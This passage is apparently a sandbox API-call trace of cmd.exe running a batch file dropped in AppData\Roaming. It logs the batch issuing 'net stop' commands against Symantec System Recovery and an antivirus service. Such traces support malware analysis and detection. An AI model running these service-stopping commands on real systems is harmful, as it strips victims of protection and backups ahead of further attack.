[0039.874] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0039.874] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.874] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.874] GetLastError () returned 0x2 [0039.874] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0039.874] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.874] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.874] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0039.874] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0039.875] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0039.875] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.875] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Symantec System RecoveryΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Symantec System RecoveryΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Symantec System RecoveryΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x5b0, dwThreadId=0x570)) returned 1 [0039.878] CloseHandle (hObject=0x78) returned 1 [0039.879] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.879] GetProcessHeap () returned 0x3e0000 [0039.879] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.879] GetEnvironmentStringsW () returned 0x3f8408* [0039.879] GetProcessHeap () returned 0x3e0000 [0039.879] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.879] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.879] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0040.095] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0040.104] CloseHandle (hObject=0x74) returned 1 [0040.104] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0040.104] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0040.104] GetProcessHeap () returned 0x3e0000 [0040.104] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.104] GetEnvironmentStringsW () returned 0x3f8408* [0040.104] GetProcessHeap () returned 0x3e0000 [0040.104] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.104] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.104] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0040.104] GetProcessHeap () returned 0x3e0000 [0040.104] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.104] GetEnvironmentStringsW () returned 0x3f8408* [0040.104] GetProcessHeap () returned 0x3e0000 [0040.104] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.104] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.104] GetProcessHeap () returned 0x3e0000 [0040.104] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0040.104] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0040.104] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.104] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0040.105] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.105] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0040.105] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.105] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0040.105] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.105] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0040.105] SetConsoleInputExeNameW () returned 0x1 [0040.105] GetConsoleOutputCP () returned 0x1b5 [0040.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0040.105] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0040.106] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0040.106] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.106] SetFilePointer (in: hFile=0x74, lDistanceToMove=1454, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ae [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0040.106] GetProcessHeap () returned 0x3e0000 [0040.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0040.107] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.107] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ae [0040.107] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1313, lpOverlapped=0x0) returned 1 [0040.107] SetFilePointer (in: hFile=0x74, lDistanceToMove=1477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5c5 [0040.107] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=23, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop Antivirus /y\r\nstem RecoveryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 23 [0040.107] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.107] GetFileType (hFile=0x74) returned 0x1 [0040.107] _get_osfhandle (_FileHandle=3) returned 0x74 [0040.107] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5c5 [0040.107] GetProcessHeap () returned 0x3e0000 [0040.107] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0040.107] GetProcessHeap () returned 0x3e0000 [0040.107] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0040.107] _tell (_FileHandle=3) returned 1477 [0040.108] _close (_FileHandle=3) returned 0 [0040.108] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0040.108] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0040.108] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0040.108] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0040.108] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0040.108] _wcsicmp (_String1="net", _String2="CD") returned 11 [0040.108] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0040.108] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0040.108] _wcsicmp (_String1="net", _String2="REN") returned -4 [0040.108] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0040.108] _wcsicmp (_String1="net", _String2="SET") returned -5 [0040.108] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0040.108] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0040.108] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0040.108] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0040.108] _wcsicmp (_String1="net", _String2="MD") returned 1 [0040.108] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0040.108] _wcsicmp (_String1="net", _String2="RD") returned -4 [0040.108] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0040.108] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0040.108] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0040.108] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0040.108] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0040.108] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0040.108] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0040.108] _wcsicmp (_String1="net", _String2="VER") returned -8 [0040.108] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0040.108] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0040.108] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0040.108] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0040.109] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0040.109] _wcsicmp (_String1="net", _String2="START") returned -5 [0040.109] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0040.109] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0040.109] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0040.109] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0040.109] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0040.109] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0040.109] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0040.109] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0040.109] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0040.109] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0040.109] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0040.109] SetErrorMode (uMode=0x0) returned 0x1 [0040.109] GetProcessHeap () returned 0x3e0000 [0040.109] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0040.109] GetProcessHeap () returned 0x3e0000 [0040.109] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0040.109] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.109] GetProcessHeap () returned 0x3e0000 [0040.109] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0040.109] GetProcessHeap () returned 0x3e0000 [0040.109] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0040.109] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0040.109] GetProcessHeap () returned 0x3e0000 [0040.109] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0040.109] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.109] GetProcessHeap () returned 0x3e0000 [0040.109] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0040.109] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0040.109] GetProcessHeap () returned 0x3e0000 [0040.109] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0040.110] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.110] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.110] GetLastError () returned 0x2 [0040.110] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.110] GetLastError () returned 0x2 [0040.110] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.110] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.110] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.110] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0040.110] GetLastError () returned 0x2 [0040.111] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0040.111] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0040.111] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.111] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0040.111] SetErrorMode (uMode=0x0) returned 0x1 [0040.111] GetProcessHeap () returned 0x3e0000 [0040.111] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0040.111] GetProcessHeap () returned 0x3e0000 [0040.111] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0040.111] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.111] GetProcessHeap () returned 0x3e0000 [0040.111] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0040.111] GetProcessHeap () returned 0x3e0000 [0040.111] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0040.111] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0040.111] GetProcessHeap () returned 0x3e0000 [0040.111] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0040.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.111] GetProcessHeap () returned 0x3e0000 [0040.111] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0040.111] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0040.111] GetProcessHeap () returned 0x3e0000 [0040.111] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0040.112] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.112] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.112] GetLastError () returned 0x2 [0040.112] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.112] GetLastError () returned 0x2 [0040.112] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0040.112] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0040.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0040.112] GetLastError () returned 0x2 [0040.112] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0040.112] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0040.112] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0040.113] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0040.113] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0040.113] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0040.113] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0040.113] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop Antivirus /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop Antivirus /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop Antivirus /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x508, dwThreadId=0x4a4)) returned 1 [0040.116] CloseHandle (hObject=0x74) returned 1 [0040.116] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0040.116] GetProcessHeap () returned 0x3e0000 [0040.116] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.116] GetEnvironmentStringsW () returned 0x3f8408* [0040.117] GetProcessHeap () returned 0x3e0000 [0040.117] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.117] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.117] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0040.387] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0040.400] CloseHandle (hObject=0x78) returned 1 [0040.400] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0040.400] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0040.401] GetProcessHeap () returned 0x3e0000 [0040.401] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.401] GetEnvironmentStringsW () returned 0x3f8408* [0040.401] GetProcessHeap () returned 0x3e0000 [0040.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.401] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.401] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0040.401] GetProcessHeap () returned 0x3e0000 [0040.401] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.401] GetEnvironmentStringsW () returned 0x3f8408* [0040.401] GetProcessHeap () returned 0x3e0000 [0040.401] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.401] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.401] GetProcessHeap () returned 0x3e0000 [0040.401] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0040.401] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0040.401] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.401] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0040.401] _get_osfhandle (_FileHandle=1) returned 0x264 [0040.401] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0040.401] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.401] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0040.402] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0040.402] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0040.402] SetConsoleInputExeNameW () returned 0x1 [0040.402] GetConsoleOutputCP () returned 0x1b5 [0040.402] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0040.402] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0040.402] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0040.402] _get_osfhandle (_FileHandle=3) returned 0x78 [0040.402] SetFilePointer (in: hFile=0x78, lDistanceToMove=1477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5c5 